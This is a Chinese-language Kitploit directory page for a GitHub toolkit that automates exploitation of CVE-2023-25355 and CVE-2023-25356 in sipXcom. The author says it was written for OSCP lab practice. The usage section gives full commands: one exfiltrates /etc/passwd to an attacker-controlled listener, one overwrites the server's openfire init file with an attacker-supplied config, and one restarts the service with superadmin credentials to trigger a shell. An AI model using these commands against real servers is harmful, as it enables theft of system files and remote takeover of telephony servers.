Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-25355-25356 — CVE-2023-25355 和 CVE-2023-25356 并带有自动服务重载 | Kitploit
工具/GitHubGitHub/glefait/cve-2023-25355-25356
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubglefait/cve-2023-25355-25356

CVE-2023-25355-25356

CVE-2023-25355 和 CVE-2023-25356 并带有自动服务重载

查看仓库
112年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

漏洞利用与致谢

该漏洞由 [email protected] 发现,并以两篇精彩文章呈现:

  • 完整披露文章
  • DEFCON31 幻灯片

Alex Linov 发布了一个仓库,用于进一步自动化此漏洞:

  • https://github.com/AlexLinov/sipXcom-RCE

目标

CVE-2023-25355 是一种数据外泄机制,攻击者将 sipXcom 服务器上的文件上传到其控制的 Web 服务器。

CVE-2023-25356 是第一个漏洞的扩展,攻击者可以将自己控制的文件写入 sipXcom 服务器的文件系统。 由于 sipXcom 服务能够覆盖自身的 init 配置,因此一旦服务重启,即可轻松获取 shell。

这里值得注意的是,sipXcom 的超级管理员用户可以重启该服务。 因此,本工具包的目的就是完全自动化该服务的重启过程。

为什么要完全自动化?

在准备 OSCP 时,有些实验环境包含需要攻破的机器。

在某个特定的实验环境中,存在此漏洞的机器相当不稳定,这意味着你有时需要多次启动和回滚实验环境。 这很烦人。一旦自动化,就没那么烦人了。

需求

你需要:

  • 一个目标可访问的 Web 服务器,能够提供和/或接收文件。
  • Python 和 poetry

使用方法

安装

root@kitploit:~
poetry install

然后,你可以从激活的环境运行该工具,从当前目录运行,或者从其他目录使用 CVE 名称运行:

root@kitploit:~
# 如果 poetry 环境已激活 (poetry shell)
cve_2023_25355 --help

# 否则,从当前目录
poetry run cve_2023_25355 --help

# 否则,从其他目录
poetry -C /shared/tools/CVE/CVE-2023-25355 run cve_2023_25355 --help

CVE-2023-25355

在以下示例中,我们发送一个 payload 来外泄 /etc/passwd 文件,该文件将被上传到攻击者控制的 HTTP 监听器。

root@kitploit:~
cve_2023_25355 \
    --xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
    --xmpp-server-address 1.2.3.4 \
    --payload '--data-binary @/etc/passwd http://ATTACKER-WEB-LISTENER/some_path'

CVE-2023-25356

在以下示例中,我们发送一个 payload,用提供的 URI 内容覆盖 /etc/init.d/openfire。

root@kitploit:~
cve_2023_25356 \
    --xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
    --xmpp-server-address 1.2.3.4 \
    --sipxcom-init-file-source-uri 'http://ATTACKER-WEB-LISTENER/my-offensive-sipx-config'

然后,如果我们知道超级管理员密码,可以重启服务以重新加载配置并触发任意 gadget。

root@kitploit:~
run sipxcom_service_restart \
    --sipxcom-superuser-username superadmin \
    --sipxcom-superuser-password superadmin_password \
    --sipxcom-website https://1.2.3.4/
    --debug-local-directory /tmp

结合 proxychains 使用

root@kitploit:~
./proxychains4 -f proxychains.conf cve_2023_25355 [...] --xmpp-server-address 172.1.2.3

项目:

  • https://github.com/rofl0r/proxychains-ng
下载工具